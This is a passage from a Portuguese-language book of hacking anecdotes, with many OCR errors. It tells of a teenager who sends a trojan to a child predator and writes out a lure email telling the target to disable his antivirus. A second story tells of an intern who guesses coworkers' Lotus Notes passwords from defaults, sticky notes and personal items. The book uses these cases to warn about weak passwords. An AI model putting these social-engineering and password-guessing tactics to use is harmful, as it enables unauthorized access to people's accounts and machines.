me deixou carrega-los em meu computador. Ele fazia coisas surpreendentes. como ver o que eu 
estava digitando, gravar minha camera de video e todos esses tipos de coisas engraęadas. Eu 
estava no paraiso. Pesquisei tudo o que pude sobre Cavalo de Tróia e comecei a envia-lo em 
executaveis populares. Entraya em salas de chat e tentaya achar alguem que llzesse o download 
de um, mas a confianęa era importante. Ninguem conllaya em mim, e tinham boas razóes para 
isso. Entrei numa sala de chat IRC de adolescentes e foi ai que o encontrei: um pedófilo 
apareceu procurando fotos de garotos e adolescentes. Primeiro eu pensei que fosse brincadeira, 
mas decidi entrar no Jogo e ver se conseguiria fazer essa pessoa de yitima. 
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Comecei a conversar em particular com ele, me fazendo passar por uma garota que tinha 
toda intenęao de encontra-lo um dia — mas nao da maneira que ele pensava. O cara era 
doente, no mlnimo. Meus instintos de quinze anos clamayam por justięa no mundo. Eu 
queria queimar aquele sujeito de tal maneira que ele tivesse de pensar duas vezes antes 
de sair caęando garotos de novo. Tentei, em yarias ocasióes, enviar um Tróia para ele, 
mas o cara era mais esperto que eu. Ele tinha um software antivlrus instalado que 
bloqueava cada tentativa minha, O engraęado era que ele nunca suspeitou de minha 
malicia. Ele achava que talvez meu computador estivesse infectado e o vlrus estivesse se 
anexando as fotos que eu tentava enviar. Eu me fazia de bobo. 

Depois de alguns dias de papo, ele comeęou a me pressionar. Queria fotos pornograficas 
minhas e me disse que me amava e queria se encontrar comigo. Ele era um calhorda de 
primeira e o alvo perfeito para ser queimado sem remorso, se eu conseguisse entrar. Eu 
tinha juntado informaęoes suficientes sobre ele para ganhar acesso a algumas de suas 
contas de e-mail. Voce sabe aquelas perguntas secretas que eles lhe fazem? "Qual e sua 
cor fayorita?" "Qual e o nome de solteira de sua mae?" Tudo o que eu tinha de fazer era 
caęar essas informaęóes dele e voila. eu estaria dentro. Aquela coisa que ele estava a lim 
de fazer era altamente ilegal, muita pornografia com crianęas de yarias idades, digamos. 
Eu fiquei enojado. 

Entao tive uma ideia. Se ele nao aceitasse o meu Cavalo de Tróia, talvez o aceitasse de um 
de seus colegas que gostayam de porno. Entao falsifiquei um endereęo de e-mail e escrevi 
uma mensagem curta. 

Veja este vldeo quente. Desative seu scanner de vlrus antes de fazer o 
download, porque ele estraga a qualidade. P.S. Voce me deve essa. 

Achei que com certeza ele engoliria essa. e esperei pacientemente a tarde toda por 
ele. para yerificar o e-mail. No fim, desisti. Nao dou para essa coisa [engenharia 

social], 

Entao, as onze da noite, aconteceu. Recebi a mensagem desencadeada por meu Tróia 
para me dizer que ele tinha se instalado na maquina dele. Consegui! 

Ganhei acesso e imediatamente comecei a copiar evidencias num folder [eu criei um 
no computador dele]; que nomeei de ’jailbait’. Tive todos os tipos de informaęao sobre 
o cara. O nome dele, endereęo, onde ele trabalhaya e ate mesmo em que documentos 
ele estava trabalhando na epoca. 

Nao liguei para o FBI ou para a policia locai [estava com medo por saber do materiał 
no computador daquele cara] por medo de ser preso, estava assustado- Depois de 
bisbilhotar e fuęar, descobri que ele era casado e tinha filhos. Foi horrlyel. 

Fiz a u nic a coisa que sabia. Mandei para a esposa um e-mail com todas as informaęoes 
de que ela precisaria para acessar o jailbait. Depois apaguei todos os meus yestlgios 
e descarreguei o Tróia. 
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Aąuela foi a primeira vez que senti nao apenas o gostinho de explorar códigos, mas a emoęao de 
ter feito alguma coisa. Quando obtive acesso, percebi que nao se trataya apenas de talento. 
Aquilo exigia mais do que conhecimento: exigia astucia, mentira, manipulaęao e muito 
trabalho. Mas queimar aquele idiota valeu cada segundo de energia. Eu me senti um rei aos 
quinze anos. E nao pude dizer nada a ninguem. Mas espero nunca mais ver as coisas que vi. 

...E voce nem tern de ser hacker 

Fica claro, nas muitas histórias deste livro, que a maioria dos hackers leva anos para desenvolver seu 
conhecimento. Por isso, sempre acho incrivel faęanhas que envolvem um pensamento do tipo hacker que e 
executado por alguem sem experiencia em hacking. Essa e urna delas. 

Na epoca do incidente, John estava no ultimo ano de faculdade. Ele ia se formar em ciencia da 
computaęao e conseguiu um estagio em urna empresa de gas e eletricidade local, de modo que, ao se formar, 
ele teria nao apenas um diploma, mas alguma experiencia. A empresa o colocou para trabalhar em upgrades 
do Lotus Notes para os fimcionarios. Cada vez que ele ligava para alguem para marcar um horario, pedia a 
senha do Lotus Notes da pessoa para que pudesse executar o upgrade. As pessoas nem hesitavam em fomecer 
a informaęao. 

As vezes, no entanto, ele deixava um recado na caixa postał e acabava marcando urna visita e nesse caso 
nao tinha a oportunidade de perguntar a senha com antecedencia. Voce sabe o que vai acontecer, e ele pensou 
consigo: "Descobri que 80 por cento das pessoas nunca tinham mudado sua senha desde que o Notes havia 
sido instalado em seu sistema, entao minha primeira tentativa era 'pass'". 

Se falhasse, John ia ate a baia da pessoa e dava urna olhada para ver se encontrava um post-it com todas 
as senhas dela, geralmente grudado bem no monitor ou escondido (se esta e a palavra apropriada) embaixo 
do teclado ou na primeira gaveta da mesa. 

E, se nem aquilo funcionasse, lhe restava mais urna altemativa: "Minha ultima linha de ataque era estudar 
os objetos pessoais na baia delas. Qualquer coisa que desse urna pista de nomes dos filhos, animais de 
estimaęao, hobbies e outros itens". Geralmente algumas suposiędes era tudo o que ele precisava fazer. 

Urna vez, no entanto, foi mais dificil do que o usual. "Eu ainda me lembro da senha de urna mulher que 
estava me dando trabalho, ate que notei que toda foto tinha urna moto." Num palpite, tentei 'harley'... e 
acertei. 

Satisfeito com o sucesso, ele comeęou a procurar as senhas. "Transformei aquilo num jogo. Acertava 
mais de 90 por cento das vezes e passava menos de dez minutos em cada tentativa. Aquelas que eu nao 
conseguia desvendar geralmente eram informaęao simples que eu podia ter descoberto com urna pesquisa 
mais profunda — na maioria das vezes eram as datas de aniversario dos filhos". 

O estagio revelou-se lucrativo, pois "nao só reforęou meu curriculo, como tambem me ensinou como 
nossa primeira linha de defesa contra hackers e fraca: os próprios usuarios e as senhas que eles escolhem". 



Capitulo 11 Curtas 


Esta parece ser uma mensagem poderosa para concluirmos a historia. Se todo usuario de computador aprimorasse 
suas senhas hoje a noite — e nao deixasse as novas senhas em um local de facil acesso —, amanha de manha, de 
repente, viveriamos em um mundo muito mais seguro. 

Esperamos que esta seja uma mensagem de aęao para todos que leiam este livro. 


Notas 

1. CNet News.com, "Lost World, LAPD: Hacks or Hoaxes?", de Janet Kornblum, 30 maio 1997. 

2. CNet News.com, "The Ten Most Subversive Hacks". de Matt Lakę, 27 outubro 1999. 
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